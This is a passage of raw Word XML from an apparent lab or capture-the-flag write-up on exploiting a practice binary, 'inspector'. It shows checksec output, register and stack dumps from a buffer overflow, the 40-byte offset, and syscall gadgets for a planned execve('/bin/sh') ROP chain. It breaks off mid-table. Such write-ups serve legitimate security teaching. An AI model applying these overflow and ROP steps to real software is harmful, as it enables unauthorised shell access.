              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4890048A" w14:textId="0A1D9391" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Additional checks revealed that the program does not have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>PIE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or Stack Canary, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>NX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is enabled. Nothing in the program memory had </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rwx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or other exciting permissions.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4855"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E222D3" w14:paraId="7A4FA6B9" w14:textId="77777777" w:rsidTr="00E222D3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4855" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="69B37A7C" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/6-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="256ECC5A" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">└─$ checksec inspector </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26A2625A" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] '/home/kali/Desktop/6-Week/inspector'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA3DF60" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Arch:     amd64-64-little</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FBD470F" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RELRO:    Partial RELRO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B5BD47B" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Stack:    No canary found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CF337D7" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    NX:       NX enabled</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C5A2BD1" w14:textId="79B2260B" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    PIE:      No PIE (0x400000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6883DE93" w14:textId="694796D4" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Checksec Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37603D6A" w14:textId="0F7DCF3C" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The program expects up to 32 bytes of user input, as shown in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method. A larger amount of input will cause a segmentation error when </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns at line </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x400678</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The additional data overwrites the stack; the first 8 bytes of additional data are popped into </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when gets returns, and the following 8 bytes are at the top of the stack when </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E222D3" w14:paraId="164D9E07" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10620" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="670EFA22" w14:textId="57EEAE28" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00022339">
              <w:t>registers ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E3A9D42" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rax   : 0x0               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69AFBFC5" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRPr="00022339" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>$rbx   : 0x00007fffffffded8</w:t>
            </w:r>
            <w:r w:rsidRPr="00022339">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  →  0x00007fffffffe247  →  "/home/kali/Desktop/6-Week/inspector"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="165CDDC2" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rcx   : 0x00007ffff7f9eaa0  →  0x00000000fbad2098</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03B41241" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rdx   : 0x0               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E2CF2A0" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRPr="00022339" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>$rsp   : 0x00007fffffffddc8</w:t>
            </w:r>
            <w:r w:rsidRPr="00022339">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  →  "kaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawa[...]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D64A1A5" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$rbp   : 0x6161616a61616169 ("iaaajaaa"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6899EF49" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rsi   : 0x00000000006022a0</w:t>
            </w:r>
            <w:r w:rsidRPr="00022339">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  →  "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama[...]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747DB422" w14:textId="77777777" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00E222D3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$rdi   : 0x00007ffff7fa0a40  →  0x0000000000000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656607FF" w14:textId="0AD00FE0" w:rsidR="00E222D3" w:rsidRDefault="00E222D3" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$rip   : 0x0000000000400678  →  &lt;main+46&gt; ret </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AB42499" w14:textId="594EED89" w:rsidR="00E222D3" w:rsidRDefault="00022339" w:rsidP="00E222D3">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Registers at Segfault</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00022339" w14:paraId="35F6DFFF" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10620" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="61E7070C" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>stack ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770649C6" w14:textId="2EFE6C84" w:rsidR="00022339" w:rsidRPr="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddc8│+0x0000:</w:t>
            </w:r>
            <w:r w:rsidRPr="00022339">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> "</w:t>
            </w:r>
            <w:r w:rsidRPr="00022339">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>kaaalaaa</w:t>
            </w:r>
            <w:r w:rsidRPr="00022339">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawa[...]"  </w:t>
            </w:r>
            <w:r w:rsidRPr="00022339">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>←</w:t>
            </w:r>
            <w:r w:rsidRPr="00022339">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00022339">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>$rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="474918C8" w14:textId="77777777" w:rsidR="00022339" w:rsidRPr="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddd0│+0x0008:</w:t>
            </w:r>
            <w:r w:rsidRPr="00022339">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> "maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaaya[...]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A488134" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddd8│+0x0010: "oaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A918BD9" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffdde0│+0x0018: "qaaaraaasaaataaauaaavaaawaaaxaaayaaa"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CAEC326" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffdde8│+0x0020: "saaataaauaaavaaawaaaxaaayaaa"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47814EF0" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddf0│+0x0028: "uaaavaaawaaaxaaayaaa"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46BE27A0" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007fffffffddf8│+0x0030: "waaaxaaayaaa"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F51F37C" w14:textId="0803082F" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x00007fffffffde00│+0x0038: 0x0000000061616179 ("yaaa"?) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AFC1A11" w14:textId="03CAFCA0" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at Segfault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4427EC33" w14:textId="172AFB83" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">If an attacker sends </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>inspector</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a payload consisting of 40 characters of padding followed by a valid address, the program will jump to that address when </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns. The program does not have an executable stack or useful system calls. However, an attacker can chain together "gadgets," small pieces of assembly within the program ending with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E222D3">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (return) operation, to perform larger operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D47EE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00022339">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Finding Gadgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD596B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The easiest way to get a system shell would be to use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The program has multiple gadgets that call </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, including a standalone </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operation at </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00400625</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00022339" w14:paraId="309F51F3" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10620" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3C86F0EA" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/6-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD51FDF" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ ROPgadget --binary inspector | grep -i "syscall"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E345FD7" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x0000000000400623 : mov ebp, esp ; syscall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4D8CED" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x0000000000400622 : mov rbp, rsp ; syscall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C24476D" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x0000000000400621 : push rbp ; mov rbp, rsp ; syscall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7553F307" w14:textId="36D4E695" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x0000000000400625 : syscall </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B179B3C" w14:textId="204D2E74" w:rsidR="00022339" w:rsidRDefault="00022339" w:rsidP="00022339">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Syscall Gadgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B88092" w14:textId="5992C914" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget will call </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>inspector</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has register values matching valid </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r w:rsidR="00022339">
        <w:t xml:space="preserve"> arguments,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> including the </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> opcode: </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x3b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Other gadgets can set these values before the </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget runs. The gadgets need to perform the following operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C61AD6" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Put the address to a string containing </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>"/bin/sh"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B291FF4" w14:textId="77777777" w:rsidR="00022339" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> equal to </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x00</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BE33A9" w14:textId="5B3FD707" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Place </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x3b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D0AB9D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Each of the above registers holds one of the arguments for </w:t>
      </w:r>
      <w:r w:rsidRPr="00022339">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E54A257" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>Essentially, the gadgets must perform the following:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
